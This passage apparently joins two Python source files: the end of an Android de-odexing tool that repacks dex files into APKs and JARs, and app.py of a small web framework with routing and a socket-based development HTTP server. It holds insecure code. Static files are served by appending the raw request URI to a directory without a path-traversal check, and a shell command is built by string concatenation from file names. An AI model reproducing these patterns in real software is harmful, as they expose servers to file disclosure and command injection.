Log.i(TAG, "deoat(): boot.oat not found in %s, nothing need deoat" % self.mRoot)
return self
# Phase 1: de-oat boot.oat
OatZip.deoatBootOAT(os.path.join(self.mFrwDir, self.arch, "boot.oat"))
if self.arch2.strip():
OatZip.deoatBootOAT(os.path.join(self.mFrwDir, self.arch2, "boot.oat"))
# Phase 2: de-oat all the other oat files, of which suffix is odex.
# [Android 5.0]: All the oat jars are located in the same folder with boot.oat
# Phase 3: de-oat app
# de-oat app
threadApp = threading.Thread(target = OatZip.deoatAppWithArch, args = (self.mAppDir, self.mFrwDir, self.arch, self.arch2))
threadApp.start()
threadPrivApp = threading.Thread(target = OatZip.deoatAppWithArch, args = (self.mPrivAppDir, self.mFrwDir, self.arch, self.arch2))
threadPrivApp.start()
threadApp.join()
threadPrivApp.join()
# Phase 4: de-oat framework
# de-oat framework
OatZip.deoatFrwWithArch(self.mFrwDir, self.arch)
# de-oat framework/oat/$arch
OatZip.deoatFrwOatWithArch(self.mFrwDir, self.arch)
return self
def rebuild(self):
""" Rebuild the deoated zip
"""
if self.mBootOAT == None:
Log.i(TAG, "rebuild(): boot.oat not found, nothing need rebuild")
return
# repackage app
OatZip.repackageAppWithArch(self.mAppDir, self.arch)
if self.arch2.strip():
OatZip.repackageAppWithArch(self.mAppDir, self.arch2)
OatZip.repackageAppWithArch(self.mPrivAppDir, self.arch)
if self.arch2.strip():
OatZip.repackageAppWithArch(self.mPrivAppDir, self.arch2)
# repackage framework
#$framedir/$arch
OatZip.repackageFrwWithArch(self.mFrwDir, os.path.join(self.mFrwDir, self.arch))
#$framedir/$arch/dex
if os.path.exists(os.path.join(self.mFrwDir, self.arch, "dex")):
OatZip.repackageFrwWithArch(self.mFrwDir, os.path.join(self.mFrwDir, self.arch, "dex"))
#$framedir/oat/$arch
if os.path.exists(os.path.join(self.mFrwDir, "oat", self.arch)):
OatZip.repackageFrwWithArch(self.mFrwDir, os.path.join(self.mFrwDir, "oat", self.arch))
# deal with additional apks not in system/framework system/app system/priv-app
OatZip.dealWithAdditionalApks(self.mSystemDir, self.mFrwDir, self.arch, self.arch2, self.mAllAppDirList)
# Remove arch and arch2 dir
os.chdir(self.mRoot)
shutil.rmtree(os.path.join(self.mFrwDir, self.arch))
if self.arch2.strip():
shutil.rmtree(os.path.join(self.mFrwDir, self.arch2))
if os.path.exists(os.path.join(self.mFrwDir, "oat")) :
shutil.rmtree(os.path.join(self.mFrwDir, "oat"))
@staticmethod
def deoatBootOAT(bootOAT):
""" De-oat boot.oat
"""
bootClassFolder = os.path.dirname(bootOAT)
bootClassFolderDex = os.path.join(bootClassFolder, "dex")
bootClassFolderOdex = os.path.join(bootClassFolder, "odex")
if os.path.exists(bootClassFolderDex):
Log.d(TAG, "Delete the already exists %s" %bootClassFolderDex)
shutil.rmtree(bootClassFolderDex)
if os.path.exists(bootClassFolderOdex):
Log.d(TAG, "Delete the already exists %s" %bootClassFolderOdex)
shutil.rmtree(bootClassFolderOdex)
Log.i(TAG, "De-oat %s" % bootOAT)
Utils.runWithOutput([OatZip.OAT2DEX, "boot", bootOAT])
@staticmethod
def packageDexToAppWithArch(apkFile, arch):
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
apkPath = os.path.dirname(apkFile)
appName = os.path.basename(apkFile)
app = appName[0:-4]
archPath = os.path.join(apkPath, "oat", arch)
# chagnge to arch path
os.chdir(archPath)
Log.d(TAG, "Repackage %s" %(apkFile))
dexFile = os.path.join(archPath, app + ".dex")
# mv $appdir/$app/$arch/$app.dex $appdir/$app/$arch/classes.dex
if os.path.exists(dexFile):
shutil.move(dexFile, os.path.join(archPath, "classes.dex"))
Utils.runWithOutput(["jar", "uf", apkFile, "classes.dex"])
else:
Log.d(TAG, "Repackage ERROR %s" %(apkFile))
dexFile = os.path.join(archPath, app + "-classes2.dex")
# if [[ -f "$appdir/$app/$arch/$app-classes2.dex" ]]; then
# mv $appdir/$app/$arch/$app-classes2.dex $appdir/$app/$arch/classes2.dex
if os.path.exists(dexFile):
shutil.move(dexFile, os.path.join(archPath, "classes2.dex"))
Utils.runWithOutput(["jar", "uf", apkFile, "classes2.dex"])
dexFile = os.path.join(archPath, app + "-classes3.dex")
# if [[ -f "$appdir/$app/$arch/$app-classes3.dex" ]]; then
# mv $appdir/$app/$arch/$app-classes3.dex $appdir/$app/$arch/classes3.dex
if os.path.exists(dexFile):
shutil.move(dexFile, os.path.join(archPath, "classes3.dex"))
Utils.runWithOutput(["jar", "uf", apkFile, "classes3.dex"])
os.chdir(oldDir)
@staticmethod
def deoatFrwWithArch(frwDir, arch):
""" De-oat framework
"""
if not OPTIONS.formatFrw: return
Log.i(TAG, "De-oat files of oat-format in %s" % frwDir)
archDir = os.path.join(frwDir, arch)
odexDir = os.path.join(archDir, "odex")
for item in os.listdir(archDir):
if item.endswith(".odex"):
jarFile = os.path.join(frwDir, item[0:-5] + ".jar")
if not OatZip.isDeodexed(jarFile):
odexFile = os.path.join(archDir, item)
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, odexDir])
@staticmethod
def deoatFrwOatWithArch(frwDir, arch):
""" De-oat framework oat
"""
if not OPTIONS.formatFrw: return
Log.i(TAG, "De-oat files of oat-format in %s/oat" % frwDir)
archDir = os.path.join(frwDir, arch)
odexDir = os.path.join(archDir, "odex")
oatDir = os.path.join(frwDir, "oat", arch)
if not os.path.exists(oatDir): return
for item in os.listdir(oatDir):
if item.endswith(".odex"):
jarFile = os.path.join(frwDir, item[0:-5] + ".jar")
if not OatZip.isDeodexed(jarFile):
odexFile = os.path.join(oatDir, item)
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, odexDir])
@staticmethod
def isDeodexed(apkFile):
""" Wheather apk/jar is deodexed
"""
cmd = "jar tf " + apkFile + "| grep classes.dex"
(sts, text) = commands.getstatusoutput(cmd)
if sts == 0 and text.find('classes.dex') != -1:
return True
return False
@staticmethod
def deoatAppWithArch(appsDir, frwDir, arch, arch2):
""" De-oat app
"""
if OPTIONS.formatApp == False: return
Log.i(TAG, "De-oat files of oat-format in %s" %(appsDir))
bootClassFolderArch = os.path.join(frwDir, arch, "odex")
bootClassFolderArch2 = os.path.join(frwDir, arch2, "odex")
#for app in $( ls $appdir ); do
for app in os.listdir(appsDir):
appPath = os.path.join(appsDir, app)
apkFile = os.path.join(appPath, app + ".apk")
archPath = os.path.join(appPath, "oat", arch)
#if [[ -d "$appdir/$app/$arch" ]];
if os.path.exists(archPath):
odexFile = os.path.join(archPath, app + ".odex")
#java -Xmx512m -jar $oat2dex $appdir/$app/$arch/$app.odex $framedir/$arch/odex
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, bootClassFolderArch])
else:
# if exists arch2
if arch2.strip():
arch2Path = os.path.join(appPath, "oat", arch2)
if os.path.exists(arch2Path):
odexFile2 = os.path.join(arch2Path, app + ".odex")
Utils.runWithOutput([OatZip.OAT2DEX, odexFile2, bootClassFolderArch2])
@staticmethod
def repackageFrwWithArch(frwDir, dexFolder):
""" Repackage the classes.dex into jar of frwDir.
"""
if OPTIONS.formatFrw == False : return
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
Log.i(TAG, "Repackage JARs of %s - %s" %(frwDir,dexFolder))
os.chdir(dexFolder)
for dexFile in os.listdir(dexFolder):
if dexFile.endswith(".dex") and dexFile.find("classes") == -1:
appName = dexFile[0:-4]
jarFile = os.path.join(frwDir, appName + ".apk")
if not os.path.exists(jarFile):
jarFile = jarFile[0:-4] + ".jar"
if not os.path.exists(jarFile):
dexName = "classes.dex"
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "cf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
continue
Log.d(TAG, "Repackage %s" %(jarFile))
if not OatZip.isDeodexed(jarFile):
# Put the dex and framework's jar in the same folder, and jar into the jarFile
dexName = "classes.dex"
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "uf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
dexName = "classes2.dex"
dexFile = appName + "-" + dexName
if os.path.exists(os.path.join(dexFolder, dexFile)):
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "uf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
dexName = "classes3.dex"
dexFile = appName + "-" + dexName
if os.path.exists(os.path.join(dexFolder, dexFile)):
shutil.move(os.path.join(dexFolder, dexFile), os.path.join(dexFolder, dexName))
Utils.runWithOutput(["jar", "uf", jarFile, dexName])
os.remove(os.path.join(dexFolder, dexName))
os.chdir(oldDir)
@staticmethod
def repackageAppWithArch(appDir, arch):
""" Repackage the classes.dex into apk of appDir
"""
if OPTIONS.formatApp == False: return
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
Log.i(TAG, "Repackage APKs of %s" %(appDir))
for app in os.listdir(appDir):
apkPath = os.path.join(appDir, app)
apkFile = os.path.join(apkPath, app + ".apk")
archPath = os.path.join(apkPath, "oat", arch)
dexFile = os.path.join(archPath, app + ".dex")
if os.path.exists(archPath):
if not OatZip.isDeodexed(apkFile):
OatZip.packageDexToAppWithArch(apkFile, arch)
#rm -rf $appdir/$app/$arch
shutil.rmtree(archPath)
os.chdir(oldDir)
@staticmethod
def check_validate(apkFile, arch, arch2):
'''check whether is validate apk'''
return True
@staticmethod
def dealWithAdditionalApks(systemDir, frwDir, arch, arch2, allAppDirs):
''' deal with additional apks '''
if OPTIONS.formatApp == False: return
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
bootClassFolderArch = os.path.join(frwDir, arch, "odex")
bootClassFolderArch2 = os.path.join(frwDir, arch2, "odex")
for (dirpath, dirnames, filenames) in os.walk(systemDir):
# Exclude scanned directories
if dirpath in allAppDirs:
continue
dirnames = dirnames # no use, to avoid warning
for filename in filenames:
if filename.endswith(".apk") or filename.endswith(".jar"):
apkFile = os.path.join(dirpath, filename)
if not OatZip.check_validate(apkFile, arch, arch2):
continue
archDir = os.path.join(dirpath, "oat", arch)
#app name
app = filename[0:-4]
if os.path.exists(archDir):
if not OatZip.isDeodexed(apkFile):
odexFile = os.path.join(archDir, app + ".odex")
if os.path.exists(odexFile):
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, bootClassFolderArch])
OatZip.packageDexToAppWithArch(apkFile, arch)
#rm -rf $appdir/$app/$arch
shutil.rmtree(archDir)
arch2Dir = os.path.join(dirpath, "oat", arch2)
if os.path.exists(arch2Dir):
if not OatZip.isDeodexed(apkFile):
odexFile = os.path.join(arch2Dir, app + ".odex")
if os.path.exists(odexFile):
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, bootClassFolderArch2])
OatZip.packageDexToAppWithArch(apkFile, arch2)
#rm -rf $appdir/$app/$arch
shutil.rmtree(arch2Dir)
if os.path.exists(os.path.join(dirpath, "oat")) :
shutil.rmtree(os.path.join(dirpath, "oat"))
def debug():
Log.DEBUG = True
root = "root directory the unziped files"
OatZip(root).deoat()
OatZip(root).rebuild()
if __name__ == "__main__":
debug()
|
app.py
|
# -*- coding: utf-8 -*-
import socket,time,re,os,sys,traceback,threading,urllib
from . Events import Events
from . common import *
from . import config
from mako.template import Template
from datetime import datetime
from threading import local
from .utill import filetype
from kcweb.utill.cache import cache as kcwcache
class web:
__name=None
__appname=None
__config=config
def __new__(self,name,appname=None):
self.__name=name
self.__appname=appname
if self.__name != '__main__':
def apps(env, start_response):
# REQUEST_METHOD=env['REQUEST_METHOD'] #GET
# QUERY_STRING=env['QUERY_STRING'] #a=1&b=1
# RAW_URI=env['RAW_URI'] #/aa/bb/cc?a=1&b=1
# SERVER_PROTOCOL=env['SERVER_PROTOCOL'] #HTTP/1.1
# HTTP_HOST=env['HTTP_HOST'] #212.129.149.238:39010
# HTTP_COOKIE=env['HTTP_COOKIE'] #cookie
# REMOTE_ADDR=env['REMOTE_ADDR'] #27.156.27.201
# PATH_INFO=env['PATH_INFO'] #/aa/bb/cc
# HTTP_USER_AGENT=env['HTTP_USER_AGENT'] #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
try:
env['BODY_DATA']=str(env['wsgi.input'].next(), encoding = "utf-8")
except:
env['BODY_DATA']=""
p=(config.app['staticpath']+env['RAW_URI'].replace(' ',''))
status='200 ok'
if os.path.isfile(p):
kind = filetype.guess(p)
if kind is None:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[
("Cache-Control","public, max-age=43200"),
]
else:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[
("Content-Type",kind.mime),
("Cache-Control","public, max-age=43200"),
("Accept-Ranges","bytes"),
# ("Content-Length",len(body))
]
else:
status,resheader,body=self.__routes(self,env)
body=bytes(body, encoding='utf-8')
# print(env['bodydata'])
# print("\n\nwsgi.input",env['wsgi.input'])
# print("\n\ndir(env['wsgi.input'])",dir(env['wsgi.input']))
# print("\n\nenv['wsgi.input'].__dict__",env['wsgi.input'].__dict__)
# try:
# print("\n\nwsgi.input.buf()",env['wsgi.input'].buf())
# except Exception as e:
# print("\n\nwsgi.input.buf() error:",e)
# try:
# print("\n\nwsgi.input.next()",env['wsgi.input'].next())
# except Exception as e:
# print("\n\nwsgi.input.next() error:",e)
# try:
# print("\n\nwsgi.input.read()",env['wsgi.input'].read())
# except Exception as e:
# print("\n\nwsgi.input.read() error:",e)
# try:
# print("\n\nwsgi.input.reader()",env['wsgi.input'].reader())
# except Exception as e:
# print("\n\nwsgi.input.reader() error:",e)
# try:
# print("\n\nwsgi.input.readline()",env['wsgi.input'].readline())
# except Exception as e:
# print("\n\nwsgi.input.readline() error:",e)
# try:
# print("\n\nwsgi.input.readlines()",env['wsgi.input'].readlines())
# except Exception as e:
# print("\n\nwsgi.input.readlines() error:",e)
# try:
# print("wsgi.input.aa",env['wsgi.input'].get("SCRIPT_NAME", ""))
# except Exception as e:
# print("wsgi.input.get('aa') error:",e)
# try:
# print("wsgi.input.aa",env['wsgi.input']['aa'])
# except Exception as e:
# print("wsgi.input['aa'] error:",e)
# print(dir(env['wsgi.input']).getsize)
# from io import StringIO
# stdout = StringIO()
# print("Hello world!", file=stdout)
# print(file=stdout)
# h = sorted(env.items())
# for k,v in h:
# print(k,'=',repr(v), file=stdout)
# print(stdout.getvalue().encode("utf-8"))
start_response(status,resheader)
return [body]
return apps
else:
return super().__new__(self)
def run(self,filename,host="127.0.0.1",port="39001",name='python3'):
"""运行开发环境
filename: 命令行脚本名称
host: 监听地址
port: 端口
name: python命令行解释机名字 默认python3
"""
if self.__config.app['app_debug']:
arg=sys.argv
if len(arg)==2 and arg[1]=='eventlog':
self.__impl(host=host,port=port,filename=filename)
else:
Events([name,str(filename)+'.py','eventlog'])
else:
self.__impl(
host=host,
port=port,
filename=filename
)
def __impl(self,host,port,filename):
"运行测试服务器"
try:
self.__http_server(
host=host,
port=port,
filename=filename
)
except KeyboardInterrupt:
pass
def __get_modular(self,header):
"获取模块"
modular=''
route=self.__config.route
if route['modular']:
if isinstance(route['modular'],str):
modular=route['modular']
else:
HTTP_HOST=header['HTTP_HOST'].split(".")[0]
for mk in route['modular']:
if HTTP_HOST in mk:
modular=mk[HTTP_HOST]
return modular
def __getconfigroute(self,PATH_INFO,header):
"使用配置路由"
route=self.__config.route
routedefault=route['default']
methods=route['methods']
paths=''
for path in PATH_INFO:
paths+="/"+path
try:
for item in route['children']:
if ':' in item['path']:
path=item['path'].split(':')
if(len(path)==len(PATH_INFO)):
is_pp=False
try:
item['methods']
except:pass
else:
methods=item['methods']
for k in methods: # match the request method
if header['REQUEST_METHOD'] in k:
is_pp=True
break
if path[0]==paths[:len(path[0])] and is_pp:
del PATH_INFO[0]
cs=PATH_INFO
PATH_INFO=item['component'].split('/')
for v in cs:
PATH_INFO.append(v)
routedefault=True
break
elif item['path']==paths or item['path']+'/'==paths:
PATH_INFO=item['component'].split('/')
routedefault=True
break
except:pass
return routedefault,PATH_INFO
def defaultroute(self,header,PATH_INFO):
"路由匹配"
route=self.__config.route
modular=web.__get_modular(self,header)
routedefault=route['default']
methods=route['methods']
if routedefault:
edition='index'
files=route['files']
funct=route['funct']
else:
edition=''
files=''
funct=''
param=[]
urls=''
i=0
HTTP_HOST=header['HTTP_HOST'].split(".")[0]
## default routing: start ########################################################################
if modular:
if route['edition']: # module matched and an edition is configured
edition=route['edition']
routedefault,PATH_INFO=web.__getconfigroute(
self,
PATH_INFO,
header
)
if routedefault: # use routing
for path in PATH_INFO:
if path:
if i==0:
files=path
urls=urls+"/"+str(path)
elif i==1:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
else: # module configured but no edition configured
routedefault,PATH_INFO=web.__getconfigroute(
self,
PATH_INFO,
header
)
if routedefault: # use default routing
for path in PATH_INFO:
if path:
if i==0:
edition=path
elif i==1:
files=path
urls=urls+"/"+str(path)
elif i==2:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
elif route['edition']: # edition configured but no module matched
edition=route['edition']
routedefault,PATH_INFO=web.__getconfigroute(
self,
PATH_INFO,
header
)
if routedefault: # use default routing
for path in PATH_INFO:
if path:
if i==0:
modular=path
elif i==1:
files=path
urls=urls+"/"+str(path)
elif i==2:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
else: # fully default routing
routedefault,PATH_INFO=web.__getconfigroute(self,PATH_INFO,header)
for path in PATH_INFO:
if path:
if i==0:
modular=path
elif i==1:
edition=path
elif i==2:
files=path
urls=urls+"/"+str(path)
elif i==3:
funct=path
urls=urls+"/"+str(path)
else:
param.append(urllib.parse.unquote(path))
i+=1
# default routing: end ############################################################
return methods,modular,edition,files,funct,tuple(param)
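# Worked example (illustrative): with no modular/edition configured (the "fully
# default" branch above), a request for
#     /home/v1/user/profile/42
# is split into PATH_INFO = ['home', 'v1', 'user', 'profile', '42'] and mapped to
#     modular='home', edition='v1', files='user', funct='profile', param=('42',)
# i.e. the dispatcher below will resolve home/controller/v1/user.py and call profile('42').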
def __tran(self,data,status,resheader):
"转换控制器返回的内容"
if isinstance(data,tuple):
i=0
for item in data:
if i==0:
body=item
elif i==1:
status=item
elif i==2:
if isinstance(item,dict):
for key in item:
resheader[key]=item[key]
else:
raise Exception('Error: the third return value is not a dict')
else:
break
i+=1
else:
body=data
return body,status,resheader
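# Illustrative examples of controller return values accepted by __tran above:
#     return "hello"                                             # body only
#     return "hello", "404 Not Found"                            # body + status
#     return "hello", "200 OK", {"Content-Type": "text/plain"}   # body + status + extra headers
# Any tuple elements beyond the third are ignored; a non-dict third element raises.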
def __set_globals(self,header):
globals.HEADER.Method=header['REQUEST_METHOD']
globals.HEADER.URL=header['RAW_URI']
globals.HEADER.PATH_INFO=header['PATH_INFO']
globals.HEADER.QUERY_STRING=header['QUERY_STRING']
globals.HEADER.SERVER_PROTOCOL=header['SERVER_PROTOCOL']
globals.HEADER.HTTP_HOST=header['HTTP_HOST']
globals.HEADER.BODY_DATA=header['BODY_DATA']
try:
globals.HEADER.HTTP_COOKIE=header['HTTP_COOKIE']
except:
globals.HEADER.HTTP_COOKIE=None
globals.HEADER.HTTP_USER_AGENT=header['HTTP_USER_AGENT']
def __del_globals():
globals.VAR = local()
globals.HEADER = local()
globals.G = local()
def __routes(self,header):
body="这是一个http测试服务器"
status="200 ok"
resheader={"Content-Type":"text/html; charset=utf-8"}
web.__set_globals(self,header)
PATH_INFO=header['PATH_INFO'].split('/')
del PATH_INFO[0]
methods,modular,edition,files,funct,param=web.defaultroute(self,header,PATH_INFO)
if header['REQUEST_METHOD'] in methods:
try:
obj=getattr(web.__appname,modular)
except (AttributeError,UnboundLocalError):
status="500 Internal Server Error"
body=web.__tpl(
title = status,
e=status,
data="无法找到目录:"+str(modular)+"/"
)
else:
try:
obj=getattr(obj,"controller")
except (AttributeError,UnboundLocalError):
status="404 Not Found"
body=web.__tpl(
title = status,
e=status,
data="无法找到目录:"+str(modular)+"/controller/"
)
else:
try:
obj=getattr(obj,edition)
except (AttributeError,UnboundLocalError) as e:
con="无法找到目录:"+str(modular)+"/controller/"+str(edition)+"/"
try:
data=getattr(obj,"error")(e,con)
body,status,resheader=web.__tran(
self,
data,
status,
resheader
)
except (AttributeError,UnboundLocalError):
status="404 Not Found"
body=web.__tpl(
title = status,
e=status,data=con
)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,e=e
)
else:
try:
obj=getattr(obj,files)
except (AttributeError,UnboundLocalError) as e:
con="无法找到文件:"+str(modular)+"/controller/"+str(edition)+"/"+str(files)+".py"
try:
data=getattr(obj,"error")(e,con)
body,status,resheader=web.__tran(
self
,data
,status
,resheader
)
except (AttributeError,UnboundLocalError):
status="404 Not Found"
body=web.__tpl(
title = status
,data=con
,e=status)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=e
)
else:
try:
data=None
if self.__config.app['before_request']: # function executed before the request
try:
data=getattr(obj,self.__config.app['before_request'])()
if data:
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except (AttributeError):
print(traceback.format_exc())
pass
except Exception as e:
try:
data=getattr(obj,"error")(e,traceback.format_exc().split("\n"))
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except (AttributeError):
data=True
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
# print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,e=e
)
except Exception as e:
data=True
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,e=e
)
if not data:
data=getattr(obj,funct)(*param)
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except Exception as e:
try:
data=getattr(obj,"error")(e,traceback.format_exc().split("\n"))
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except (AttributeError):
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=e
)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=e
)
else:
status="405 Method Not Allowed"
body=web.__tpl(
title = status,
data='405 Method Not Allowed',
e=''
)
try:
resheader['set-cookie']=globals.set_cookie
del globals.set_cookie
except:pass
if self.__config.app['after_request']: # function executed after the request
try:
data=getattr(obj,self.__config.app['after_request'])()
if data:
body,status,resheader=web.__tran(self,data,status,resheader)
except (AttributeError,UnboundLocalError):pass
except Exception as e:
try:
data=getattr(obj,"error")(e,traceback.format_exc().split("\n"))
body,status,resheader=web.__tran(
self,data,
status,
resheader
)
except AttributeError as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status
,data=errms,
e=e
)
except Exception as e:
status="500 Internal Server Error"
errms=status
if self.__config.app['app_debug']:
print(traceback.format_exc())
errms=traceback.format_exc().split("\n")
body=web.__tpl(
title = status,
data=errms,
e=""
)
resheaders=[]
for key in resheader:
resheaders.append((key,resheader[key]))
web.__del_globals()
if isinstance(resheaders,list):
if not body:
body=''
return str(status),resheaders,str(body)
else:
raise Exception()
def __tpl(**context):
path=os.path.split(os.path.realpath(__file__))[0]
body=''
with open(path+'/tpl/error.html', 'r',encoding='utf-8') as f:
content=f.read()
t=Template(content)
body=t.render(**context)
return body
def __http_server(self,host,port,filename):
tcp_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
tcp_socket.bind((host,int(port)))
except OSError:
print("通常每个套接字地址(协议/网络地址/端口)只允许使用一次(按CTRL+C退出)")
else:
tcp_socket.listen(1024)
print('! Warning: this is a development server. Do not use it in a production deployment')
print('* For production, gunicorn is recommended, e.g.: gunicorn -b '+host+':'+str(port)+' '+str(filename)+':app')
if self.__config.app['app_debug']:
print('* Debugger: on')
else:
print('* Debugger: off')
print("* Running on http://"+host+":"+str(port)+"/ (press CTRL+C to quit)")
while True:
new_tcp_socket,client_info=tcp_socket.accept()
t=threading.Thread(target=self.__server_client,args=(new_tcp_socket,))
t.daemon=True
t.start()
tcp_socket.close()
def __server_client(self,new_socket):
# Handle the HTTP request from a client connection
data=new_socket.recv(1047576).decode()
if data:
datas=data.split("\r\n")
data1=datas[0]
# request
REQUEST_METHOD=data1.split("/")[0].replace(' ','') ##GET
RAW_URI=re.findall(REQUEST_METHOD+"(.+?) HTTP", data1) #/aa/bb/cc?a=1&b=1
if RAW_URI:
RAW_URI=RAW_URI[0]
else:
RAW_URI=''
PATH_INFO=RAW_URI.split("?")[0] #/aa/bb/cc
QUERY_STRING=RAW_URI.replace(str(PATH_INFO),'').replace('?','') #a=1&b=1
SERVER_PROTOCOL=data1.split(" ")[-1] #HTTP/1.1
HTTP_HOST=re.findall("Host: (.+?)\r\n", data)#212.129.149.238:39010
if HTTP_HOST:
HTTP_HOST=HTTP_HOST[0]
else:
HTTP_HOST=''
HTTP_COOKIE=re.findall("Cookie: (.+?)\r\n", data)#cookie
if HTTP_COOKIE:
HTTP_COOKIE=HTTP_COOKIE[0]
else:
HTTP_COOKIE=''
REMOTE_ADDR=''
HTTP_USER_AGENT=re.findall("User-Agent: (.+?)\r\n", data) #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
if HTTP_USER_AGENT:
HTTP_USER_AGENT=HTTP_USER_AGENT[0]
else:
HTTP_USER_AGENT=''
BODY_DATA=datas[len(datas)-1]
# print(data)
# request
reqheader={
'REQUEST_METHOD':REQUEST_METHOD,
'RAW_URI':RAW_URI,
'PATH_INFO':PATH_INFO,
'QUERY_STRING':QUERY_STRING,
'SERVER_PROTOCOL':SERVER_PROTOCOL,
'HTTP_HOST':HTTP_HOST,
'HTTP_COOKIE':HTTP_COOKIE,
'REMOTE_ADDR':REMOTE_ADDR,
'HTTP_USER_AGENT':HTTP_USER_AGENT,
'BODY_DATA':BODY_DATA
}
p=(config.app['staticpath']+RAW_URI.replace(' ',''))
status='200 OK'
if os.path.isfile(p):
kind = filetype.guess(p)
if kind is None:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Cache-Control","public, max-age=43200"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Content-Type",kind.mime),("Cache-Control","public, max-age=43200"),("Accept-Ranges","bytes"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
status,resheader,body=self.__routes(reqheader)
body=body.encode()
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
print(HTTP_HOST+' -- ['+str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))+'] "'+REQUEST_METHOD+" "+RAW_URI +" "+SERVER_PROTOCOL + '" '+status+"-")
t=time.time()
header+="Server:kcweb\n"
header+="Date:%s\n" % datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
for t in resheader:
header+="%s:%s\n" % (t[0],t[1])
header+="\n"
try:
new_socket.send(header.encode())
new_socket.send(body)
except Exception as e:
pass
new_socket.close()
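# Illustrative example of the ad-hoc request parsing above: for a raw request
# beginning with
#     GET /aa/bb/cc?a=1&b=1 HTTP/1.1\r\nHost: 127.0.0.1:39001\r\n...
# the code derives (modulo surrounding whitespace) REQUEST_METHOD='GET',
# RAW_URI='/aa/bb/cc?a=1&b=1', PATH_INFO='/aa/bb/cc', QUERY_STRING='a=1&b=1',
# SERVER_PROTOCOL='HTTP/1.1', and BODY_DATA is taken from the last
# CRLF-separated chunk of the received payload.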
def __http_sever(self,host,port):
# HTTP test server (non-blocking variant)
if self.__config.app['app_debug']:
print('* Debugger: on')
else:
print('* Debugger: off')
print("* Running on http://"+host+":"+str(port)+"/ (press CTRL+C to quit)")
tcp_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp_socket.bind((host,int(port)))
tcp_socket.listen(1024)
pack_length=1024
tcp_socket.setblocking(False)
tcp_socket_list=list()
while True:
try:
new_tcp_socket,client_info=tcp_socket.accept()
except:
pass
else:
new_tcp_socket.setblocking(False)
tcp_socket_list.append(new_tcp_socket)
for cli_soc in tcp_socket_list:
try:
data=cli_soc.recv(pack_length).decode()
except Exception as e:
pass
else:
if data:
datas=data.split("\r\n")
data1=datas[0]
# request
REQUEST_METHOD=data1.split("/")[0].replace(' ','') ##GET
RAW_URI=re.findall(REQUEST_METHOD+"(.+?) HTTP", data1) #/aa/bb/cc?a=1&b=1
if RAW_URI:
RAW_URI=RAW_URI[0]
else:
RAW_URI=''
PATH_INFO=RAW_URI.split("?")[0] #/aa/bb/cc
QUERY_STRING=RAW_URI.replace(str(PATH_INFO),'').replace('?','') #a=1&b=1
SERVER_PROTOCOL=data1.split(" ")[-1] #HTTP/1.1
HTTP_HOST=re.findall("Host: (.+?)\r\n", data)#212.129.149.238:39010
if HTTP_HOST:
